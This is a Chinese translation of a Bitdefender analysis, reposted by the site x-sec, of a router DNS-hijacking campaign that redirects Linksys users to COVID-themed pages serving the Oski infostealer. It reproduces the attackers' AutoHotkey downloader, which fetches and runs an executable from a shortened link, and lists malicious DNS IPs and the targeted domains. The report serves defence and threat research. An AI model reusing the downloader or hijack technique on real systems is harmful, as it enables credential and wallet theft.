主要发现:
- 主要针对Linksys路由器,强行使用远程管理凭据
- 劫持路由器并更改其DNS IP地址
- 将特定的网页/域列表重定向到以冠状病毒为主题的恶意网页
- 使用Bitbucket存储恶意软件样本
- 使用TinyURL隐藏Bitbucket链接
- 丢弃Oski Inforstealer恶意软件
攻击如何进行
对于黑客来说,背负流行病之类的全球新闻以发送带有受污染附件的网络钓鱼电子邮件并不少见,但最近的进展证明,即使这些邮件没有创造性地折衷受害者。 攻击者似乎一直在寻找易受攻击的路由器的互联网,试图通过暴力破解密码来破坏它们,并更改其DNS IP设置。 DNS设置非常重要,因为它们就像电话簿一样工作。每当用户键入网站名称时,DNS服务都可以将其发送到提供该特定域名的相应IP地址。简而言之,DNS的工作原理几乎与智能手机的日程安排相同:每当您要呼叫某人时,您只需查找其姓名,而不必记住他们的电话号码。 一旦攻击者更改了DNS IP地址,他们就可以解决任何请求并将用户重定向到攻击者控制的网页,而无需任何人明智。 DNS IP地址如下:- 109.234.35.230
- 94.103.82.249
- “ aws.amazon.com”
- “ goo.gl”
- “ bit.ly”
- “ washington.edu”
- “ imageshack.us”
- “ ufl.edu”
- “ disney.com”
- “ cox.net”
- “ xhamster.com”
- “ pubads.g.doubleclick.net”
- “ tidd.ly”
- “ redditblog.com”
- “ fiddler2.com”
- “ winimage.com”



- 一个cab文件,其中嵌入了一个.net文件,该文件使用TinyUrl服务从bitbucket存储库中下载了最终的有效负载
- 一个自动热键脚本,它将直接从bitbucket存储库中下载最终的有效负载。
; <COMPULTER: v1.1.22.07>
#NoTrayIcon
UrlDownloadToFile, https[:]//tiny.cc/w81hlz, %A_AppData%\pre_set.exe
Loop
{
IfExist, %A_AppData%\pre_set.exe
{
RunWait, %A_AppData%\pre_set.exe ooplod
Sleep, 1000
ExitApp
}
在攻击的最后阶段,下载了带有MPRESS的恶意文件。此有效载荷是Oski窃取程序,可与C&C服务器进行通信以上传被盗的信息。
Oski是一个相对较新的信息窃取者,似乎已经在2019年末出现。它包含的一些功能围绕提取浏览器凭据和加密货币钱包密码,其创建者甚至吹嘘说它可以提取存储在各种Web浏览器的SQL数据库中的凭据。和Windows注册表。
在第一阶段,我们还观察到.net文件具有一个URL(hxxps:// iplogger [。] org / 1l8Gp),该URL指向攻击者可以用来跟踪受感染IP地址和数量的统计信息页面。受感染的受害者。
受害人
根据从我们发现仍在增加的两个Bitbucket存储库中的累计下载量来看,过去几天中,当前潜在的受害者数量估计约为1,193。 在调查过程中,Bitdefender研究人员发现了4个Bitbucket存储库。这意味着受害者的数量可能会更高,因为Bitbucket已经删除了其他两个存储库,这使我们无法完全了解受害者的数量。 另一个证明这是相对较新的攻击的命中是Bitdefender的遥测,表明它全部始于3月18日,并于3月23日达到活动高峰(图1)。 我们估计受害者的数量在未来几周内可能会增加,尤其是如果攻击者建立了其他存储库(无论是托管在Bitbucket还是其他代码存储库托管服务上),因为冠状病毒大流行仍然是“热门话题”。



注意安全!
建议除了更改路由器的控制面板访问凭据(最好不是默认的访问凭据)外,用户还应更改其Linksys云帐户凭据或路由器的任何远程管理帐户,以避免通过暴力或凭据填充进行接管攻击。 当然,我们也强烈建议确保路由器的固件始终是最新的,因为它可以防止攻击者利用未修补的漏洞来接管设备。 最后但同样重要的是,请确保所有设备都安装了安全解决方案,以防止您访问网络钓鱼或欺诈性网站以及下载和安装恶意软件。妥协指标
危害指标包括下载程序,最后阶段的有效负载,存储库的URL以及最后阶段的有效负载的C&C。
未经允许不得转载:x-sec » Bitdefender发布《新的路由器DNS劫持攻击滥用Bitbucket来托管Infostealer》分析报告